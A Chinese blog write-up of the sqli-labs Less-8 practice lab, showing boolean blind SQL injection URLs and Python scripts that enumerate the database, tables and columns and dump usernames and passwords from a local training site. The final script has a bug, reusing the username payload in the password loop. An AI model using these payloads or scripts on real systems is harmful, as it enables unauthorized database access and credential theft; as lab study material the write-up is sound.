从零记录sqli-labs学习过程sqli-labs Less-8

从零记录sqli-labs学习过程sqli-labs Less-8,第1张

sqli-Labs Less-8

又是鸽了好几天没有做题了,今天想起来赶紧补上(本想保持一两天一道的速度快速做完前二十三道题,疯狂摆)

老规矩上来先测闭合类型:
http://localhost/sqli-labs/Less-8/index.php?id=1
http://localhost/sqli-labs/Less-8/index.php?id=1'
http://localhost/sqli-labs/Less-8/index.php?id=1' and 1=2 --+

单引号闭合布尔类型盲注,只有You are in…和无回显两种情况,布尔盲注那就上手去试吧

因为练习这么多关都知道数据库名字和字段了,直接给出所有语句,具体思路就是不断去更改判断条件看有无回显,直到试出正确名称,自己练题手动去多打打语句找找感觉,实 *** 建议上脚本工具,手动跑工作量太大了

判断版本:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(version(),3)=5.7 --+

判断数据库长度:
http://localhost/sqli-labs/Less-8/index.php?id=1' and length(database())=8 --+

数据库名称:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(database(),8)='security' --+

数据库字段数:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+

数据库字段:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+   (emails表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),8)='referers' --+ (referers表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),7)='uagents' --+  (uagents表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+    (users表)

users表字段数:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3 --+

users表字段:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password' --+

到了跑用户名和密码的时候我发现不能这么列了,还是得写一个脚本批量去跑数据,就去研究了一下python脚本怎么写,因为自己现学python,水平有限也是参考了诸多大佬的文章,现在将各部分代码给出

测试数据库长度:

import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20length(database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       #做一个编码处理,否则运行会出现报错信息
for i in range(1, 20):
    p =payload.format(a=i)
    u = requests.get(url+p)
    if str2 in u.content:
        print('对比成功长度为',i)
        break

获取数据库名称:

import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20left(database(),{Name_order})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '=', '+', '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
database_name = ''
for i in range(1, 10):
    for str in list1:
        p =payload.format(Name_order=i,Name=database_name+str)
        u = requests.get(url+p)
        if str2 in u.content:
            database_name = database_name+str
            print('匹配第',i,'位成功')
            break
print('database name is', database_name)

获取数据库字段数:

import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20(select%20count(table_name) from information_schema.tables where table_schema=database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       #做一个编码处理,否则运行会出现报错信息
for i in range(1, 10):
    p =payload.format(a=i)
    u = requests.get(url+p)
    if str2 in u.content:
        print('对比成功长度为',i)
        break

获取数据库字段名称:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20left((select table_name from information_schema.tables where table_schema=database() limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@',  '$',  '^',  '*', '(', ')', '-', '_', '=',  '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ''
field_name2 = ''
field_name3 = ''
field_name4 = ''
for i in range(0, 4):
    for j in range(1, 20):
        if i == 0 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name1+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name1 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
        if i == 1 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name2+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name2 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
        if i == 2 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name3+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name3 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
        if i == 3 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name4+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name4 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
print('字段1为', field_name1)
print('字段2为', field_name2)
print('字段3为', field_name3)
print('字段4为', field_name4)

获取users表字段:

import requests
url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20(select%20count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       #做一个编码处理,否则运行会出现报错信息
for i in range(1, 10):
    p =payload.format(a=i)
    u = requests.get(url+p)
    if str2 in u.content:
        print('对比成功长度为',i)
        break

获取users表字段:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload = "and%20left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@',  '$',  '^',  '*', '(', ')', '-', '_', '=',  '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ''
field_name2 = ''
field_name3 = ''
for i in range(0, 3):
    for j in range(1, 20):
        if i == 0 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name1+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name1 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
        if i == 1 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name2+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name2 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
        if i == 2 :
            for str in list1:
                p =payload.format(Name_order=i, Name_num=j, Name=field_name3+str)
                u = requests.get(url+p)
                if str2 in u.content:
                    field_name3 += str
                    print('匹配第', i+1, '张表第', j, '位成功')
                    break
print('字段1为', field_name1)
print('字段2为', field_name2)
print('字段3为', field_name3)

三个表的字段数自己手试一试就好,比写脚本要快的多,或者直接脚本大范围去试一样的

最后就是导出username和password

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   #根据自己的sqli-labs路径更改url
payload1 = "and%20left((select username from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
list1 =['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
         'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
         'Z', '.']
str1 = "You are in..........."
str2 = str1.encode() #做一个编码处理,否则运行会出现报错信息
field_name1 = ['', '', '', '', '', '', '', '', '', '', '', '', '']
field_name2 = ['', '', '', '', '', '', '', '', '', '', '', '', '']

for i in range(0, 13):
    for j in range(1, 20):
        for str in list1:
            p =payload1.format(Name_order=i, Name_num=j, Name=field_name1[i]+str)
            u = requests.get(url+p)
            if str2 in u.content:
                field_name1[i] += str
                print('匹配第', i, '个字段第', j, '位成功')
                print(field_name1)
                break
payload2 = "and%20left((select password from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
for i in range(0, 13):
    for j in range(1, 20):
        for str in list1:
            p = payload1.format(Name_order=i, Name_num=j, Name=field_name2[i] + str)
            u = requests.get(url + p)
            if str2 in u.content:
                field_name2[i] += str
                print('匹配第', i, '个字段第', j, '位成功')
                print(field_name2)
                break
print('字段username', field_name1)
print('字段password', field_name2)


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/719261.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-25
下一篇 2022-04-25

发表评论

登录后才能评论

评论列表(0条)

保存